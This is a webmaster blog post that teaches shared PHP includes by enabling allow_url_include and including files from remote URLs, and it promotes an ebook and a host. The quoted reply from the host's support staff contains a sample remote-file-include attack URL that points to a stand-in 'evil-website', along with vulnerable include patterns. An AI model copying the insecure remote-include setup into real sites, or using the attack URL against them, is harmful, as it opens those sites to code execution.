Blog

Want to Build Websites the SMART Way – Use This Golden Tip!

This article is a bit geeky (naturally), but I have tried my best to make it as easy for you as possible. Even then, if you have any questions, feel free to contact me :)

Site Under Construction Photo

1. The Story

First, enjoy the story. This is not a Pulitzer-prize winning story by the way so don’t expect anything extraordinary out of it. ;)

A guy called Tom was good at building plain html websites. He used to build his site the old fashioned way, with a standard HTML editor. The biggest drawback of his site was that he couldn't change even a minor part of his website without editing the entire site!

Anyway, for this Tom guy, the first few years went well, until his business began to progress and he realized that he needed to update some of the old information displayed on his website.

Now, since he made the site the 'old-fashioned' way, he had to download the entire website even though he needed to change only a couple of little things here and there!

So Tom wasted hours upon hours in doing too much of unnecessary work. He could have reduced his workload by at least half IF he had the intelligence of using PHP includes on his websites!

If he had used PHP includes, he could easily change any part of his website without having to edit the whole thing (which is no doubt a lot more time consuming).

If you are not building your sites using  PHP includes, YOU could be the next Tom ;)

With PHP includes, you can have separate files, each for Adsense block, eBay block, links menu, and of course, header and footer. Your site won’t look any different than a static html website! Neither your visitors nor the mighty Google would be able to know that you are using PHP includes in your site. And the benefit?

If you want to change your Adsense block, you simply open the Adsense file in your favorite HTML editor, make the necessary changes and upload the file back to your server. Your changes would be instantly reflected on the ENTIRE website!

Same could be said for header or footer. Maybe you want to use a different header image, or change the color of the header? You can easily do that by changing ONLY the header file; you don’t need to change the entire website.

Okay, I hope that by now one thing is clear to you: PHP includes can be a HUGE time saver for any webmaster!

If you already know a bit about PHP includes, continue reading. However, if you are new to it, I highly recommend you buy this PHP Guide (comes with resell and plr rights).

It is mainly beginner stuff, and a bit old too, but I would be forever grateful to this little ebook. For me, it was more valuable than several other 'make-money' ebooks I have purchased. Why? For the first time, with the help of this ebook, I learnt the art of building my sites the 'smart' way!  :)

Let me give you an example of how much I benefited from this short report.

There as a time when EBay used to accept only US affiliates. Finding no other option, I had to use Amazon.com for the purpose of promoting merchandise. I was neither too happy with my conversions nor the revenue, but what the hell could I do?

Fortunately, several months later, the GOOD news came: eBay started accepting international affiliates, including Indians! I quickly jumped and signed up! Now was the time to replace all my Amazon ad codes with eBay ad codes.

Back then I had the habit of using the header file as a container for the ads (I agree the header is not the right place for the ads, but back then I was a complete newbie as per as PHP is concerned). Anyway, changing the ad codes for the entire site was simply a matter of changing the header file!

With the old technique you would learn about in the above-mentioned PHP guide, you would still have to work a bit! Let's say that you have 3 websites:

http://www.xxx1.com/

http://www.xxx2.com/

http://www.xxx3.com/

Now, let’s say that you need to change the Adsense codes of each of these websites, and let’s further assume that the ad code is in the header file of each site. So, naturally you would have to edit the header of EACH site (which means a total of three headers).

This is the old way of doing things. The new age webmasters do things in a different way: they put the editable header on only ONE website, and include that header file through a remote link on the other sites. With this method, you need to edit only ONE header file (instead of three) in order to reflect your changes on all the three websites.

For example, you could have your editable header at http://www.xxx1.com/. With the help of PHP includes, you could call that remote header to be included in your other websites, viz.,  http://www.xxx2.com/ and http://www.xxx3.com/

I hope I am clear up to this point. Let's dig deeper into it!

2. Benefits of the Advanced Technique: There are several benefits of this technique:

1. You could have your ad file on a remote server, and you can include that ad on all of your other websites. Thus, if you ever need to change the ad, you simply make ONE tweak in the remote server's ad file and the changes would be reflected on all of your other websites which call that ad file!

2. Or, you could have a footer file (with links menu) on a remote website, and you could include that file into all of your other websites. Thus, if you ever need to change the footer of all of your websites, you need to change only the footer of the remote site.

For this method to work, all the footers must of course share a common theme. If one site's footer is different from the other then it won’t work.

With this method, you are not limited to just ads or headers/footers. You can call inline optin forms from a remote website and include it on another site.

With the help of PHP includes, you can include ANY type of code into your webpage: be it PLAIN html code, or PHP or JavaScript.

For instance, if you want to include copyright information into your webpage, you can include either the following Javascript code into the footer of the site:

<script language = 'JavaScript' type="text/javascript">
<!–
function y2k(number) { return (number < 1000) ? number + 1900 : number; }
var today = new Date();
var year = y2k(today.getYear());
document.write('&copy; '+year+' by Verge Soft Inc. All Rights Reserved Worldwide');
//–>
          </script>

OR use the following PHP code:

Copyright 2001 – <?=date("Y");?>. All rights reserved.

Think of it as an artificial Christmas tree: the index.php is the base of the tree and the other files are its branches. You simply plug the branches in the right positions and your tree is setup! :D

3. The Steps:

Note: I highly recommend that you use either Dreamweaver or PSPad Editor for these steps. :)

Step1: Ask your webhost to switch on allow_url_fopen (if it is not already switched on; most hosts have it switched on by default) for your account

Step2. Now is the time to switch on the allow_url_include. This is something you need to do yourself!

Download PSPAD if you haven’t already (it's free)! Open a new, blank file, and include only this code in that file:

 allow_url_include = on

Save it as a php.ini file. Upload this file to the SAME directory where all the other files of your site are located. You would need to upload this file to each and every directory from where you want to call remote files using the PHP includes function.

You can download a sample php.ini file here

Step3: Edit your .htaccess file

I recommend you use a free editor like PSPAD for this purpose.

Open the .htaccess file, then add the following lines of code into it (at the very END of the contents of the .htaccess file):

If your server is on PHP4, then you can add either of the following directives:

AddType application/x-httpd-php .php .html .htm

OR

AddHandler application/x-httpd-php .php .html .htm

If your server is on PHP5 (my server is), then you should use the following directives instead:

AddType application/x-httpd-php5 .php .html .htm

OR

AddHandler application/x-httpd-php5 .php .html .htm

If none of the above directives work for you, then you should contact your host and get the required information from them!

If you are not sure which PHP version your server is using, just download this file, unzip it, upload the file to your server's root directory, and run it through your browser. At the very top you will find the php version of your server!

The .htaccess file is usually located at the root directory of your domain; if it is an addon domain, then you might need to create the .htaccess file MANUALLY. Simply use PSPAD as before, create a blank file, include any one of the above directives, and save it as .htaccess

Hey, what are you waiting for? Now upload the .htaccess file to your server!

Thankfully our 'ordeal' is soon going to be over ;)

Step4: Now is the time to do the fun part of the work: that is, calling the remote file using PHP includes function. I have figured it would be better to actually create some sample files for you instead of confusing you with all the coding right here (as a matter of fact, my list consists mostly of internet marketers rather than programmers ;) )

Sample1: In this sample I am using a regular PHP file in which I have called a remote HTML file using PHP includes! In this file you will see a code like:

<? include("http://www.flexiblewriter.com/weightloss-myths-mrr.html"); ?>

Click here to download this file.

Sample2: In this sample I am using an empty PHP file in which I have called the same URL using PHP includes!

Click here to download this file.

Sample3: In this sample I am using an empty HTML file in which I have called the same URL using PHP includes!

Click here to download this file.

Sample4: In this sample I am using an empty PHP file in which I have called a different URL (with .php extension), again using PHP includes! In this file you will see a code like:

<?php include("http://www.flexiblewriter.com/contact.php"); ?>

Click here to download this file.

So, in conclusion, if you are new to PHP includes, I highly recommend you get this short php template guide

Add to that what you have learnt in this article and you will soon become an expert 'PHP' webmaster. :D

Oh, and if there is any 'Tom' in your locality, don’t forget to direct him to this article (just kidding) ;)

IMPORTANT: Security Risks Associated with Remote File Includes!

PHP has always been criticized for being a 'weak' programming language, and one of the worst criticism it has faced is regarding the security vulnerability caused by the use of remote file includes. In this context, you might want to read this article!

I had almost finished writing this article when I was suddenly reminded of my friend Hope Renee. To make sure that there is no mistake in this article, I asked her to review it. She is herself a PHP programmer and deserves a linkback for the help she offered me regarding this article.

If it was not for her, I won’t have even thought about including the security part in this article. Thanks Hope :D

DO NOT forget to read till the end of this article to find a 'happy ending' ;)

She pointed out to me that:

"The part of the article I disagree with is suggesting use of allow_url_fopen and allow_url_include. There are security vulnerabilities regarding the use of remote file includes. All you need do is Google those settings adding the word "security" to your search phrase to find out more.

There IS however a simple way to still allow php includes to be shared by multiple websites (assuming they are all hosted on the same server)…. simply place your php includes files in a directory ABOVE the web accessible root directory (e.g. Above DOCUMENT ROOT) and include them by path.

Let's say you have multiple sites all hosted on a server and their file paths might be something like

/home/domain1/public_html/ ,
/home/domain2/public_html/ ,

etc…

Then you could create a sub-directory at the /home/ level, let's call it "my_includes"… put your php include files there…. and include them from scripts on your multiple domains in the form of:

include '/home/my_includes/whatever.php'; "

Sorry Hope, I tried your suggestion but it didn’t work. :(  The reason (as I learned later from my host) is that my server has a security restriction called open_basedir. If this restriction were not in place, all webmasters would be able to view each other's files by including them in their webpages, which in turn would pose a lot of security issues.

I tried it on another server but I kept getting the same errors.

Hope's suggestion however would work fine if the two domains in question are on the same account. For example, if your website is an addon domain of another domain, then you could call any file from the root directory into that addon domain using local path commands.

Aside from the instructions I gave above, there is another way you can use to achieve the same thing. Read this article!

Again, for this to work, all the domains must be under the SAME account!

For domains which are on same server but different accounts (as was my case), you would need to use remote file paths, such as http://www.domain.com/xxxx.html or http://www.domain.com/xxxx.php 

However, I didn’t end topic just here. I asked my webhost (there are some very intelligent support staff there, lol): "Is there any security issue associated with allow_url_include turned on?"

Their answer:

"Yes and no.

By default, having it enabled is not a security risk. However, there are zillions of amateur PHP developers who do not understand the security implications of that setting, and if they write bad code, then it's possible that the setting could be abused.

If you want to see a bunch of code that was written poorly that pertains to allow_url_include, go here: http://milw0rm.com/search.php

and type this into the search box: remote file include

You will see a lot of examples of bad PHP code which has things like this:

include($index);

and this:

require "{$news_cfg['path']}/german.inc.php";

and this:

include($config_file);

and this:

include($include_path."settings.php");

etc.

Using the first example: include($index);

*if* the $index variable is not properly handled, a remote attacker can do something like this: http://example.com/script.php?index=http://evil-website/file-with-PHP-commands.txt?command=commands-go-here

Notice how the index variable is being set to http://evil-website/file-with-PHP-commands.txt?command=commands-go-here

Good PHP practices will not allow that, as good PHP code would restrict the usage of the index variable.

Your best bet is to ask the vendor of the code you are using if they fully understand and take steps to protect against remote file include attacks, and local file include attacks. If they can't answer those questions, I would not personally trust their code."

I said: "Well, there is no question of php script here. I am just trying to call a remote html file into another, so I guess I am safe. :)

Still, I want to be sure that if I use this setting only for calling ordinary html files from remote servers, and assuming that there is no PHP script involved in here, is there still a way a hacker could exploit it?

For example, let's say that I want to include:

http://xxxxxx.com/footer.html

into this file:

http://yyyyyy.com/index.php "

They said that as long as I'm carefully controlling what files can be included, (which cannot be influenced by a website visitor), then it should be ok.

And here are two final tips:

When it comes to php scripts, especially if they are custom coded for you, I think it is best to have it reviewed by a couple of other programmers. I have a friend who purchased an article directory software for almost $300 and even took their help to do some customizations on the software.

For years there was no issue, then one day, suddenly, out of the blue he told me that his site was hacked! The developers were not intelligent enough to be able to fix the security holes in the script, lol and it was not even updated regularly!

He told me that he had learnt his lesson and would make sure to have each and every script reviewed by a few other programmers before using them!

Yes, most of us, including me, don’t and cannot abide by that rule, because it is easier said than done. I personally buy scripts only from reputed, long-time, and trustworthy vendors; same goes for programmers too ;)

It is equally important to choose a host like Myriadnetworks where you can find intelligent support staff who know how to take care of their servers properly.

I am really glad for all the frequent updates they do for security reasons. They were one of the first hosts to upgrade their servers to PHP5 because PHP4 was nearing EOL (End of Life); Hostgator did the same thing much later. :)

Let me end the article by saying that PHP includes has been a huge time saver for me, and I am not going to stop its use, no matter what others say ;)

What about you?

As always, your comments are welcome! :)

1 Comment

  1. Arindam Chakraborty.com » 2 Easy Ways To Make Money From Dead Sites

    […] http://flexiblewriter.com/want-to-build-websites-the-smart-way-use-this-golden-tip […]